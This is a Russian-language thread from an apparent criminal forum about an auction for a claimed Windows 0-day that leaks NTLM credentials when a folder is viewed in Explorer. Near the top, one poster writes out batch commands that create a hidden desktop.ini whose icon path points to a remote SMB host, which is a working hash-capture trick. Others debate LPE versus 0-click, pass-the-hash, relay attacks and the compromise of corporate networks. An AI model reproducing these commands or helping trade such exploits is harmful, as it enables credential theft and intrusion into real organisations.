Аукцион! 0-Day Windows Leak Credentials Exploit /threads/126240/

[distamx]

mkdir Folder
attrib +s Folder
cd Folder
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\1.2.3.4\aa >> desktop.ini
attrib +s +h desktop.ini

Оно?

 

[Krypt0n]

Не оно)

 

[Wardet]

Я конечно могу ошибаться, но где тут LPE с 0day?
В видео генерируется ярлык с иконкой на удаленный SMB сервак, при запросе к серверу прилетает NTLMv2 ПОЛЬЗОВАТЕЛЯ, который к тому же надо брутить
Такой способ получения хеша существует далеко не один год, куча примеров на гитхабе, в т.ч. через ярлыки

 

[Krypt0n]

Отпиши в ПМ статьи где есть лик нтлм хеша через .ico файл. С удовольствием почитаю. И да, ознакомся для начала с описанием.

 

[Shockwave]

поправьте если не прав, но поскольку LPE - Local Privileges Elevation, то исходя из описания эксплойта он не есть ЛПЕ. Перехват НТЛМ хеша не есть эскалация привилегий

Эксплойт создает файл, который указывает на сетевую директорию
как на удаленный ресурс и добавляет иконку для него. Когда пользователь открывает
папку с этим файлом через Проводник, система автоматически пытается подключиться
к удаленному ресурсу, инициируя процесс аутентификации через NTLM.

Таким образом, без участия пользователя происходит передача данных аутентификации
(NTLM-хешей) на удаленный сервер, где их можно перехватить и использовать для
дальнейшего анализа или атак.

 

[Krypt0n]

технически да, это не LPE. Но получив хеш любого админа или юзера (с брученного впн учетки) можно так поднять права. И к тому же pass-the-hash бессмертная классика.

 

[bryanross]

Гид по NTLM Relay. Захватываем NTLM-аутентификацию для Relay-атаки

Почему мы до сих пор встречаем NTLM-аутентификацию во многих инфраструктурах? Потому что Windows не может существовать без нее. Но у NTLM-аутентификации есть целый ряд проблем, которыми пользуются злоумышленники. Одна из них — это возможность Relay-атак. В этой статье мы обсудим способы захвата...

xakep.ru

Я не на что не претендую, но разве техника не паблик ?
Способ реализации такой атаки — использование ярлыков, ссылающихся на удалённые ресурсы. При открытии папки с таким ярлыком система пытается загрузить иконку для ярлыка с удалённого сервера, что приводит к отправке NTLM-хеша пользователя на сервер злоумышленника. Подробное описание этой техники представлено в статье на сайте Xakep.ru.

 

[EncryptHub]

Не паблик, ярлыки не ворк в последних обновлениях. Плюс, у ярлыков по дефолту стрелочка присутствует, в данном случае - не lnk, не url не еще что-либо, что обычно пользуют.

 

[Vinki]

Боже. Я уже не удивляюсь людям которые пытаются засрать подобные продажи. Да прочитай ты внимательно описание, после чего высерай. Никакого конструктива чисто из-за того, что люди не умеют читать.
В описании ясно указано, какой тип файла используют. Там ни слова про .lnk .url и прочий паблик мусор.
В описании ясно указано, что с жертвой не нужно никакого взаимодействия. От слова совсем.
На то он и 0day, что никому неизвестно как он работает.
На то он и LPE, что само по себе подчеркивает важность атаки, так как получение хэша это начальный этап для дальнейшей более сложной атаки на привилегии (например, DA, LA и т. д.).

Нет бл#ть, нужно всунуть свои 25 копеек, без каких либо аргументов или статтей. Я считаю, если хочешь что-то доказать - вникни в тему, а затем суй свой нос куда не просят.
В общем сколько людей - столько и мнений. Лишь бы высрать.

Прошу прощение за флуд в аукционе.

 

[Lipshitz]

This you?

https://www.securityweek.com/windows-zero-day-exploited-by-russia-triggered-with-file-drag-and-drop-delete-actions/

 

[Krypt0n]

«Минимальное взаимодействие пользователя с вредоносным файлом, такое как выбор (один щелчок), осмотр (правый щелчок) или выполнение действий, отличных от открытия или выполнения, может привести к возникновению этой уязвимости», - отмечается в сообщении Microsoft от 12 ноября.

В твоей ссылке указано, что эксплойт имеет взаимодействие с файлом.
В моем варианте - никакого взаимодействия не требуется, т.е. 0click.
Исходя из этого, нет - это не я)

 

[alphaman]

На xss нет аукционов

 

[gri]

На xss нет аукционов

Да, бордом ошибся Но тема интересная.

 

[gri]

**0-click уязвимость**: активация происходит только при открытии папки в Проводнике.

Технически это Зироуклик, конечно

АПД: перечитал, беру свои слова обратно.

 

[weaver]

Попросили проянить. Так как ТС вводит в заблуждение.

Эксплойт создает файл ....
Когда пользователь открывает
папку с этим файлом через Проводник, система автоматически пытается подключиться
к удаленному ресурсу, инициируя процесс аутентификации через NTLM.

1) Это локально удаленный эксплойт. Файл должен находится в системе жертвы .
2) Это не зероклик. Зероклик подразумевает не взаимодействовать с целью. Для тригерра пользователь должен увидеть файл в проводнике и он должн находится у жертвы. Поэтому это 1-клик. Поскольку файл надо доставить жертве, а это скорее всего будет почта и когда он его скачает. Вам прилетят хеши. Короче это 1-клик.
_______________________________________________________________________________________________________

Zero-Click это когда ты невзаимодействуешь с целью. Например посылаешь специально сформированный запрос на IP\PORT. После чего ты получаешь шелл к примеру. Даже браузерные эксплойты не являютя зеро-кликами. Потому что надо открыть сайт где будет расмещен эксплойт. Правда тут есть небольшая хитрость с редиректом на сайт с эксплойтом. Что приблежает его к зероклику но как таковым он не будет.

 

[varwar]

Попросили проянить. Так как ТС вводит в заблуждение.

1) Это локально удаленный эксплойт. Файл должен находится в системе жертвы .
2) Это не зероклик. Зероклик подразумевает не взаимодействовать с целью. Для тригерра пользователь должен увидеть файл в проводнике и он должн находится у жертвы. Поэтому это 1-клик. Поскольку файл надо доставить жертве, а это скорее всего будет почта и когда он его скачает. Вам прилетят хеши. Короче это 1-клик.
_______________________________________________________________________________________________________

Zero-Click это когда ты невзаимодействуешь с целью. Например посылаешь специально сформированный запрос на IP\PORT. После чего ты получаешь шелл к примеру. Даже браузерные эксплойты не являютя зеро-кликами. Потому что надо открыть сайт где будет расмещен эксплойт. Правда тут есть небольшая хитрость с редиректом на сайт с эксплойтом. Что приблежает его к зероклику но как таковым он не будет.

Плюсую, под 0-click'ом всегда RCE подразумеваются. Я бы убрал это из названия темы.

 

[weaver]

Спойлер: оффтоп

Плюсую, под 0-click'ом всегда RCE подразумеваются. Я бы убрал это из названия темы.

Подкоректировал топик.

Особенно позабавили следующие цитаты

В моем варианте - никакого взаимодействия не требуется, т.е. 0click.

Файл доставить надо на комп жертвы. Это уже как бы взаимодействие с пользователем.

В описании ясно указано, что с жертвой не нужно никакого взаимодействия. От слова совсем.

Когда пользователь открывает папку с этим файлом через Проводник.
ахахха

Если интересен пример файлового эксплойта зероклика. То это выглядит так.

Обычно уязвимости в AV это LPE, т.е. уязвимости в драйверах ав. Но ав напичканы всякими парсерами, эмуляторами и виртуализацией, поэтому тут работают и эксплойты формата файла. Например AV начинает сканировать CHM файл в итоге получаем исполнение кода. (с правами), но для этого нам нужно быть в системе. Что не является зерокликом. Зероклик вариант - мы шлем на корп почту аттач с этим chm файлом (эксплойтом формата файла), в итоге антивирус его автоматически скачает, начнет его анализировать (происходит триггер) и мы получим удаленном исполнение кода и вся корпоративная сеть скомпрометирована.

 

[Krypt0n]

Спойлер: оффтоп

Подкоректировал топик.

Особенно позабавили следующие цитаты


Файл доставить надо на комп жертвы. Это уже как бы взаимодействие с пользователем.

Когда пользователь открывает папку с этим файлом через Проводник.
ахахха

Если интересен пример файлового эксплойта зероклика. То это выглядит так.

имеется ввиду взамодействия пользователя с самим файлом. Несколько раз упомянул, что взаимодействия или открытия этого файла НЕ нужно, а лишь только открыв проводник. Если бы этот файл нужно было бы открывать, я бы низачто сюда на аукцион не выставил. Т.к таким он был бы немощный.

 

[weaver]

имеется ввиду взамодействия пользователя с самим файлом. Несколько раз упомянул, что взаимодействия или открытия этого файла НЕ нужно, а лишь только открыв проводник. Если бы этот файл нужно было бы открывать, я бы низачто сюда на аукцион не выставил. Т.к таким он был бы немощный.

Дружище я не в коем случае не хочу припятствовать твоему аукциону. Ты пойми простую истину это не зероклик. Файл нужно скачать чтобы он сработал и увидеть в проводнике. Я понимаю что запускать файл не нужно. Он автоматически отрабатывает как только он будет виден в проводнике. Ну или даже подключаться на шару. Это уже взаимодействие. Я уверен эксплойт найдет своих покупателей те кто занимаются корпами.

зеро-клик это когда пользователь в обще ничего не должен делать не открывать не закрывать не переходить, НИЧЕГО. Он как занимался своими делами так и занимался. И в друг к нему по сети прилетел TCP\IP пакет, который стригерил уязвимость и атакующий получил шелл. Во всяком случае как warvar сказал зероклики это RCE в первую очередь. А не креды.

 

[Vinki]

Спойлер: оффтоп

Подкоректировал топик.

Особенно позабавили следующие цитаты


Файл доставить надо на комп жертвы. Это уже как бы взаимодействие с пользователем.

Когда пользователь открывает папку с этим файлом через Проводник.
ахахха

Если интересен пример файлового эксплойта зероклика. То это выглядит так.

Исходя из описания и инструкции которую я видел:
Когда речь идет об уязвимости, которая не требует активного участия пользователя, это подразумевает, что активация данной уязвимости может происходить независимо от каких-либо преднамеренных действий со стороны жертвы. Достаточно того, что файл, содержащий потенциально вредоносный код, уже присутствует на компьютере. Например, если пользователь случайно открывает папку с обычными файлами, процесс может сработать автоматически, минуя осознанное участие.
В терминах оценки безопасности, взаимодействие с пользователем обычно требует какого-либо активного действия, такого как открытие файла, нажатие кнопки или ввод данных. В случае с этим эксплойтом, если пользователь просто открывает папку, и это автоматически инициирует процесс (например, подключение к удаленному серверу) активации эксплойта, то это не считается активным взаимодействием с эксплойтом.

4. **Взаимодействие с пользователем (User Interaction - UI)**
- **Нет взаимодействия (None - N)**: Для запуска уязвимости взаимодействие пользователя не требуется,
поскольку Windows автоматически подгружает иконку.
- **Оценка: N**

О доставке файла:
В ситуации, когда мы имеем дело с корпоративной сетью и доступом к пользователям в домене, появление такого файла на рабочем месте жертвы может произойти незаметно. Доставка файла - дело атакующего, т.к. я уже в сети. Здесь не нужна почта, а темболее взаимодействие со скачиванием файла от лица пользователя.


varwar
Термин "0-click" обычно относится к уязвимостям, которые могут быть использованы для атаки на систему без какого-либо взаимодействия со стороны пользователя. Это подразумевает, что жертве не нужно ничего нажимать или открывать, чтобы уязвимость активировалась.
Однако не все 0-click уязвимости обязательно приводят к удаленному выполнению кода (RCE). Они могут также вызывать другие нежелательные эффекты, такие как утечка информации, изменение данных и т. д. RCE является одной из наиболее серьезных форм атак, но не единственной.


P.S.
Чтоб получить NTLM хэш или поднять привилегии в корпоративной сети - нам нужно использовать почту для доставки малваря. Аплодирую стоя!

P.S.2 Перенесите в оффтоп аукцион, раз флуд не удаляете. weaver varwar